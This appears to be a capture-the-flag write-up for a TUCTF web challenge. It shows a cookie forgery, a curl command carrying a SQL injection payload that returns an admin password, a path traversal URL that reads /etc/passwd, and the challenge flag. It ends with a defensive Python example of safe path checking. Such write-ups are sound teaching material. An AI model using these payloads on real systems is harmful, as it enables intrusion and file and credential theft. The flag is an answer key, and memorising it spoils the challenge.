Cute Animals [web]

Recon

The login form at http://chal.tuctf.com:30000/loginform.html can be reached by clicking Admin login in the menu, provided the allowed cookie is set to the base64 encoding of "true":

echo -en "true" | base64
dHJ1ZQ==

By default it is set to false.

Admin login

The admin login is vulnerable to SQL injection. Fetching the admin password:

curl -s -v "http://chal.tuctf.com:30000/admin.php" -d "username=admin&password=' OR 1=1 LIMIT 0,1-- "
<link href="login.css" rel="stylesheet" type="text/css"><h4>Results</h4><p>user password</p><p>bro  ultimate699</p>

Solution

Read /etc/passwd

http://chal.tuctf.com:30000/portal.php?file=.../.../..//.../.../..//.../.../..//.../.../..//.../.../..//etc/passwd&Submit=Submit

TUCTF{m0r3_cut3_4n1m415_c4n_b3_f0und_4t_https://bit.ly/1HU2m5Q}
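
The file parameter in the portal.php request only turns into a traversal if the server deletes "../" in a single pass; that filter is an assumption inferred from the shape of the string, not something shown on this page. The following is an added example, not the challenge's code (BASE_DIR and the function names are hypothetical), comparing that filter with a lookup that canonicalises the path and rejects anything outside the base directory.

```python
import os

# Hypothetical document root; the challenge's real directory layout is not on the page.
BASE_DIR = "/var/www/html/files"

# The file parameter from the portal.php request above.
PAGE_PARAM = ".../.../..//" * 5 + "etc/passwd"


def naive_strip(name: str) -> str:
    """Assumed weak filter: delete every "../" in one left-to-right pass."""
    return name.replace("../", "")


def weak_resolve(name: str) -> str:
    """Path a handler opens when it trusts the single-pass filter."""
    return os.path.normpath(os.path.join(BASE_DIR, naive_strip(name)))


def resolve_checked(name: str) -> str:
    """Canonicalise the joined path, then require it to stay under BASE_DIR."""
    base = os.path.realpath(BASE_DIR)
    target = os.path.realpath(os.path.join(base, name))
    if os.path.commonpath([base, target]) != base:
        raise ValueError(f"rejected: {name!r} resolves outside {base}")
    return target


if __name__ == "__main__":
    print("after filter :", naive_strip(PAGE_PARAM))
    print("weak handler :", weak_resolve(PAGE_PARAM))
    print("checked, raw :", resolve_checked(PAGE_PARAM))
    for candidate in (naive_strip(PAGE_PARAM), "/etc/passwd"):
        try:
            resolve_checked(candidate)
        except ValueError as exc:
            print(exc)
```

Without the filter the raw string resolves to a nonexistent path inside BASE_DIR; it is the filter's own output that escapes, which is why the check has to run on the final canonical path rather than on the input text.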